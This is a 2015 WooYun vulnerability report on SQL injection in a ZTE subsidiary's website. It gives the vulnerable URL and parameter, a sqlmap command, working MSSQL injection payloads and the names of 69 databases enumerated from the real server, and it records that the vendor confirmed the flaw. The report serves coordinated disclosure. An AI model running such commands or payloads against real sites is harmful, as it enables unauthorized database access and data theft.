当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095507

漏洞标题:中兴某分站存在SQL注入漏洞

相关厂商:中兴通讯股份有限公司

漏洞作者: 中央军

提交时间:2015-02-04 17:22

修复时间:2015-03-21 17:24

公开时间:2015-03-21 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-05: 厂商已经确认,细节仅向厂商公开
2015-02-15: 细节向核心白帽子及相关领域专家公开
2015-02-25: 细节向普通白帽子公开
2015-03-07: 细节向实习白帽子公开
2015-03-21: 细节向公众公开

简要描述:

详细说明:

http://www.zte-v.com.cn

中兴长天信息技术(南昌)有限公司是中兴通讯集团公司体系下的高科技公司,公司主要从事RFID、水利及WSN等领域软件及硬件产品的研发,提供全面的、系统的水利、RFID及WSN应用解决方案,研发团队具有十多年信息化建设解决方案的经验。
存在SQL注入漏洞,出现问题的地方:

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35

NodeID参数有问题。

sqlmap.py -u "http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35" -p NodeID --dbs


sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: NodeID
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: FID=2&NodeID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3317=3317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: FID=2&NodeID=(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: NodeID
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: FID=2&NodeID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3317=3317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: FID=2&NodeID=(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:
[*] BDQN_cn
[*] chengjumeng
[*] chengmingshi
[*] daikuan
[*] daikuan1
[*] dongshengzhongzhu
[*] DT_hr
[*] DT_sys
[*] fenghuang
[*] FindDemo
[*] fuzhouyuqixuexiao
[*] GaoSheng
[*] haohanguanwang
[*] hongrunhuagong
[*] jiangxiguomei
[*] jingpinkecheng
[*] jinpaizhoupu
[*] jiuzhongyuantaoci
[*] jxjn
[*] kangsheng
[*] kongtiao
[*] KongTiao02130401
[*] kongtiao2
[*] kunyuanduanxinpingtai_1
[*] lianjing
[*] loushanglou
[*] lvdu
[*] master
[*] MAXAN
[*] MeiRongMeiFa
[*] message
[*] model
[*] msdb
[*] nankeshipin
[*] nchkyyxy
[*] NPSMSPlatform
[*] OAManage
[*] pulangke
[*] ReportServer
[*] ReportServerTempDB
[*] shekewang
[*] shenzhengtaoci
[*] shuguangjituan
[*] shuilishuidian
[*] shuiwujituan
[*] shunshengjiangong
[*] StudentFrance
[*] tempdb
[*] tongkangjiancai
[*] Tour1
[*] Tour2
[*] UFDATA_800_2014
[*] UFDATA_800_2015
[*] UfNoteSys
[*] web8848_7
[*] weishengxinxi
[*] wit_oa
[*] xinxiwang
[*] XinXiWang2
[*] Yd1
[*] yinkuaizi
[*] youdiantian
[*] yumingqiangzhu1
[*] ZFKJ_SYXT
[*] ZFKJ_ZHJJ
[*] zhengxinshalun
[*] zhengzhongtang
[*] zhongxingchangtian
[*] Zufeng_HuaKai


69个库,不跑了!

漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-05 13:40

厂商回复:

感谢~

最新状态:

暂无